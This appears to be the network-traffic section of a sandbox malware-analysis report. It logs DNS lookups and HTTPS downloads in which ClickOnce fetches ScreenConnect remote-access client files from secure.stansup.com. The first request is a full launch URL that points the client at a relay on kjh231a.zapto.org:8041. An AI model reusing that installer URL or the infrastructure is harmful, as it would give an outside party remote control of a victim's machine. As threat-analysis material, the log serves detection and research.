                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:48.813250065 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:48.813256979 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:48.813291073 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:48.813302994 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:48.935106039 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:48.935129881 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:48.935213089 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:48.935224056 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:48.935272932 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.063802004 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.063826084 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.063952923 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.063975096 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.064037085 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.099098921 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.099122047 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.099245071 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.099261045 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.099306107 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.188417912 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.188437939 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.188572884 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.188601017 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.188647032 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.311647892 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.311669111 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.311719894 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.311738014 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.311750889 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.313926935 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.394987106 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.685029030 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.685034037 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.685065031 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.685079098 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.685846090 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.685903072 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.686001062 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.686006069 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.686053038 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.808476925 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.808530092 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.808602095 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.808615923 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.808655024 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.808675051 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.809462070 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.809511900 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.809541941 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.809546947 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.809571028 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.809591055 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.834660053 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.834692955 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.834836006 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.834845066 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.834902048 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.932583094 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.932643890 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.932729959 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.932744980 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.932758093 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.932786942 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.933315039 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.933357954 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.933391094 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.933397055 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.933427095 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.933444977 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.934087992 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.934171915 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.934185982 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.934245110 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.934257030 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.934340000 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.935024977 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.935034037 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.935065985 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.935094118 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:54.218105078 CEST497328041192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:54.223649025 CEST80414973279.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:54.223762989 CEST497328041192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:55.416069031 CEST497328041192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:55.421504974 CEST80414973279.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:55.654887915 CEST80414973279.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:55.693841934 CEST497328041192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:55.699537039 CEST80414973279.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:55.937495947 CEST80414973279.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:56.028969049 CEST497328041192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:57.854312897 CEST497328041192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:57.860429049 CEST80414973279.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:57.860543013 CEST497328041192.168.2.1079.110.49.185
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 25, 2024 19:27:16.235219002 CEST | 57435 | 53 | 192.168.2.10 | 1.1.1.1
Oct 25, 2024 19:27:16.260771036 CEST | 53 | 57435 | 1.1.1.1 | 192.168.2.10
Oct 25, 2024 19:27:54.173686028 CEST | 62518 | 53 | 192.168.2.10 | 1.1.1.1
Oct 25, 2024 19:27:54.183593988 CEST | 53 | 62518 | 1.1.1.1 | 192.168.2.10
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 25, 2024 19:27:16.235219002 CEST | 192.168.2.10 | 1.1.1.1 | 0xecab | Standard query (0) | secure.stansup.com | A (IP address) | IN (0x0001) | false
Oct 25, 2024 19:27:54.173686028 CEST | 192.168.2.10 | 1.1.1.1 | 0xce7b | Standard query (0) | kjh231a.zapto.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 25, 2024 19:27:16.260771036 CEST | 1.1.1.1 | 192.168.2.10 | 0xecab | No error (0) | secure.stansup.com | | 79.110.49.185 | A (IP address) | IN (0x0001) | false
Oct 25, 2024 19:27:18.778695107 CEST | 1.1.1.1 | 192.168.2.10 | 0xe6d4 | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 25, 2024 19:27:18.778695107 CEST | 1.1.1.1 | 192.168.2.10 | 0xe6d4 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.57.21 | A (IP address) | IN (0x0001) | false
Oct 25, 2024 19:27:18.778695107 CEST | 1.1.1.1 | 192.168.2.10 | 0xe6d4 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.57.40 | A (IP address) | IN (0x0001) | false
Oct 25, 2024 19:27:18.778695107 CEST | 1.1.1.1 | 192.168.2.10 | 0xe6d4 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.57.19 | A (IP address) | IN (0x0001) | false
Oct 25, 2024 19:27:18.778695107 CEST | 1.1.1.1 | 192.168.2.10 | 0xe6d4 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 84.201.210.21 | A (IP address) | IN (0x0001) | false
Oct 25, 2024 19:27:18.778695107 CEST | 1.1.1.1 | 192.168.2.10 | 0xe6d4 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 84.201.210.19 | A (IP address) | IN (0x0001) | false
Oct 25, 2024 19:27:18.778695107 CEST | 1.1.1.1 | 192.168.2.10 | 0xe6d4 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.57.42 | A (IP address) | IN (0x0001) | false
Oct 25, 2024 19:27:18.778695107 CEST | 1.1.1.1 | 192.168.2.10 | 0xe6d4 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.57.23 | A (IP address) | IN (0x0001) | false
Oct 25, 2024 19:27:20.369189024 CEST | 1.1.1.1 | 192.168.2.10 | 0x5ccc | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
Oct 25, 2024 19:27:20.369189024 CEST | 1.1.1.1 | 192.168.2.10 | 0x5ccc | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false
Oct 25, 2024 19:27:22.930172920 CEST | 1.1.1.1 | 192.168.2.10 | 0x1be7 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
Oct 25, 2024 19:27:22.930172920 CEST | 1.1.1.1 | 192.168.2.10 | 0x1be7 | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false
Oct 25, 2024 19:27:54.183593988 CEST | 1.1.1.1 | 192.168.2.10 | 0xce7b | No error (0) | kjh231a.zapto.org | | 79.110.49.185 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                                                      • secure.stansup.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49702 | 79.110.49.185 | 443 | 7740 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-25 17:27:17 UTC | 631 | OUT | GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=%2f&i=Untitled%20Session HTTP/1.1
Host: secure.stansup.com
Accept-Encoding: gzip
Connection: Keep-Alive
2024-10-25 17:27:17 UTC | 250 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 118229
Content-Type: application/x-ms-application; charset=utf-8
Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                      Date: Fri, 25 Oct 2024 17:27:17 GMT
                                                                                                                                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49708 | 79.110.49.185 | 443 | 7740 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-25 17:27:19 UTC | 100 | OUT | GET /Bin/ScreenConnect.Client.manifest HTTP/1.1
Host: secure.stansup.com
Accept-Encoding: gzip
2024-10-25 17:27:20 UTC | 215 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17858
Content-Type: text/html
Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 25 Oct 2024 17:27:19 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.10 | 49719 | 79.110.49.185 | 443 | 7740 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-25 17:27:25 UTC | 126 | OUT | GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1
Host: secure.stansup.com
Accept-Encoding: gzip
Connection: Keep-Alive
2024-10-25 17:27:26 UTC | 215 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 95520
Content-Type: text/html
Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 25 Oct 2024 17:27:25 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.10 | 49720 | 79.110.49.185 | 443 | 7740 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-25 17:27:27 UTC | 134 | OUT | GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1
    Host: secure.stansup.com
    Accept-Encoding: gzip
    Connection: Keep-Alive
2024-10-25 17:27:27 UTC | 215 | IN | HTTP/1.1 200 OK
    Cache-Control: private
    Content-Length: 61216
    Content-Type: text/html
    Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
    Date: Fri, 25 Oct 2024 17:27:26 GMT
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.10 | 49721 | 79.110.49.185 | 443 | 7740 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-25 17:27:29 UTC | 138 | OUT | GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1
    Host: secure.stansup.com
    Accept-Encoding: gzip
    Connection: Keep-Alive
2024-10-25 17:27:29 UTC | 213 | IN | HTTP/1.1 200 OK
    Cache-Control: private
    Content-Length: 266
    Content-Type: text/html
    Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
    Date: Fri, 25 Oct 2024 17:27:29 GMT
    Connection: close
                                                                                                                                                                                                                                                      2024-10-25 17:27:29 UTC266INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.10 | 49722 | 79.110.49.185 | 443 | 7740 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-25 17:27:30 UTC | 109 | OUT | GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1
    Host: secure.stansup.com
    Accept-Encoding: gzip
2024-10-25 17:27:30 UTC | 213 | IN | HTTP/1.1 200 OK
    Cache-Control: private
    Content-Length: 266
    Content-Type: text/html
    Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
    Date: Fri, 25 Oct 2024 17:27:30 GMT
    Connection: close
                                                                                                                                                                                                                                                      2024-10-25 17:27:30 UTC266INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.10 | 49724 | 79.110.49.185 | 443 | 7740 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-25 17:27:31 UTC | 141 | OUT | GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1
    Host: secure.stansup.com
    Accept-Encoding: gzip
    Connection: Keep-Alive
2024-10-25 17:27:31 UTC | 213 | IN | HTTP/1.1 200 OK
    Cache-Control: private
    Content-Length: 266
    Content-Type: text/html
    Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
    Date: Fri, 25 Oct 2024 17:27:31 GMT
    Connection: close
                                                                                                                                                                                                                                                      2024-10-25 17:27:31 UTC266INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.10 | 49725 | 79.110.49.185 | 443 | 7740 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-25 17:27:32 UTC | 131 | OUT | GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1
    Host: secure.stansup.com
    Accept-Encoding: gzip
    Connection: Keep-Alive
2024-10-25 17:27:33 UTC | 215 | IN | HTTP/1.1 200 OK
    Cache-Control: private
    Content-Length: 81696
    Content-Type: text/html
    Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
    Date: Fri, 25 Oct 2024 17:27:32 GMT
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.10 | 49726 | 79.110.49.185 | 443 | 7740 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-25 17:27:34 UTC | 119 | OUT | GET /Bin/ScreenConnect.Client.dll HTTP/1.1
Host: secure.stansup.com
Accept-Encoding: gzip
Connection: Keep-Alive
2024-10-25 17:27:34 UTC | 216 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 197120
Content-Type: text/html
Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 25 Oct 2024 17:27:34 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.10 | 49727 | 79.110.49.185 | 443 | 7740 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-25 17:27:36 UTC | 120 | OUT | GET /Bin/ScreenConnect.Windows.dll HTTP/1.1
Host: secure.stansup.com
Accept-Encoding: gzip
Connection: Keep-Alive
2024-10-25 17:27:37 UTC | 217 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 1721856
Content-Type: text/html
Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 25 Oct 2024 17:27:36 GMT
Connection: close
                                                                                                                                                                                                                                                      Data Ascii: ;q'}';';sX=LN.;@Pdkhk^h^tt
                                                                                                                                                                                                                                                      2024-10-25 17:27:37 UTC16384INData Raw: 4c 7c 04 39 02 fc 6f 89 01 99 02 a9 6a 7c 04 99 02 ef 58 43 1b 99 07 e2 6a 3d 0b 4c 04 6f 98 5b 00 54 04 6b bc 49 00 44 02 81 0d d9 00 08 00 14 00 2d 1c 08 00 18 00 32 1c 08 00 1c 00 37 1c 08 00 20 00 3c 1c 08 00 b8 00 41 1c 0e 00 bc 00 46 1c 0e 00 c0 00 59 1c 0e 00 c4 00 6a 1c 08 00 c8 00 7d 1c 08 00 cc 00 82 1c 0e 00 d0 00 87 1c 0e 00 d4 00 96 1c 0e 00 d8 00 a5 1c 0e 00 e0 00 ce 1c 08 00 f0 00 6c 1d 08 00 f4 00 71 1d 08 00 f8 00 76 1d 08 00 1c 01 2d 1c 08 00 20 01 32 1c 08 00 24 01 37 1c 09 00 28 01 32 1c 09 00 2c 01 37 1c 09 00 30 01 7b 1d 09 00 34 01 80 1d 09 00 38 01 32 1c 09 00 3c 01 37 1c 09 00 40 01 32 1c 09 00 44 01 37 1c 09 00 48 01 7b 1d 09 00 4c 01 80 1d 09 00 50 01 85 1d 09 00 54 01 8a 1d 09 00 58 01 8f 1d 09 00 5c 01 94 1d 09 00 60 01 99 1d
                                                                                                                                                                                                                                                      Data Ascii: L|9oj|XCj=Lo[TkID-27 <AFYj}lqv- 2$7(2,70{482<7@2D7H{LPTX\`
